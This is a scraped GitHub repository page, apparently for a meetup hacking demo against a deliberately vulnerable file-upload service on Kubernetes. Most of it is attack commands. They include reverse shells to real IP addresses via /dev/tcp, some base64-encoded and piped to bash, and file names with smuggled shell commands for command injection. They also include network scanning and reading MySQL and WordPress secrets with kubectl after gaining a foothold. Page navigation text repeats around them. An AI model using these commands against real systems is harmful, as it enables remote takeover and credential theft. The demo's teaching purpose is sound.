docker

docker build -t biltisberger/vuln-fileupload:latest .
docker push biltisberger/vuln-fileupload:latest
docker run -d --name vuln-fileupload -p 8080:8080 biltisberger/vuln-fileupload:latest

k8s

kubectl apply -f manifests/rbac.yaml 
kubectl apply -f manifests/deployment.yaml 
kubectl apply -f manifests/service.yaml 
kubectl apply -f manifests/ingress.yaml

Listen for incoming connections

sudo nc -nvl 9001

Connect to the listener

echo "bash -c 'bash -i >& /dev/tcp/192.168.178.113/1338 0>&1'" | base64
echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3OC4xMTMvMTMzOCAwPiYxJwo= | base64 -d | bash 2>/dev/null
touch ";while true; do sh -i >& /dev/tcp/128.140.44.16/9001 0>&1; sleep 1; done"

echo ";while true; do sh -i >& /dev/tcp/128.140.44.16/9001 0>&1; sleep 1; done" | base64
touch 'testfile;eval "$(echo dGVzdGZpbGU7IHdoaWxlIHRydWU7IGRvIHNoIC1pID4mIC9kZXYvdGNwLzEyOC4xNDAuNDQuMTYvOTAwMSAwPiYxOyBzbGVlcCAxOyBkb25lCg== | base64 -d)"'

lsof -i :8080

// even better with a loop if the connection dies
google.com;while true; do sh -i >& /dev/tcp/88.198.205.24/9001 0>&1; sleep 1; done

Ok we are on the host

nmap -sn 10.1.11.0/24 | grep 'Nmap scan report for' | awk '{print $5, $6}'
nmap angular2.bene-default-oi9z17.svc.cluster.local

curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x kubectl
mv kubectl /usr/local/bin/.
kubectl auth can-i --list
kubectl get pods
kubectl describe pod mysql-0
kubectl get secret mysql -o jsonpath='{.data}'
kubectl get secret wordpress -o jsonpath='{.data}'

curl https://metrics-server.mogenius.svc.cluster.local:443/apis/metrics.k8s.io/v1beta1/pods --insecure

Links

Sources

"services.K8sUpdateDeploymentRequest.Data: readObjectStart: expect { or n, but found ", error found in #9 byte of ...|{"data":"kind: Depl|..., bigger context ...|{"data":"kind: Deployment\napiVersion: apps/v1\nmetadata:\n|..."

Developer RBAC-User

login as the user create a deployment

Name		Name	Last commit message	Last commit date
Latest commit History 6 Commits
.vscode		.vscode
assets		assets
manifests		manifests
.dockerignore		.dockerignore
.gitignore		.gitignore
Cheat-Sheet.md		Cheat-Sheet.md
Dockerfile		Dockerfile
README.md		README.md
Story.md		Story.md
exploit.sh		exploit.sh
go.mod		go.mod
kubectl		kubectl
praesi.sh		praesi.sh
server.go		server.go
upload.html		upload.html

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

docker

k8s

Listen for incoming connections

Connect to the listener

Ok we are on the host

Links

Sources

Developer RBAC-User

About

Releases

Packages

Languages

mogenius/meetup-2024-hack

Folders and files

Latest commit

History

Repository files navigation

docker

k8s

Listen for incoming connections

Connect to the listener

Ok we are on the host

Links

Sources

Developer RBAC-User

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages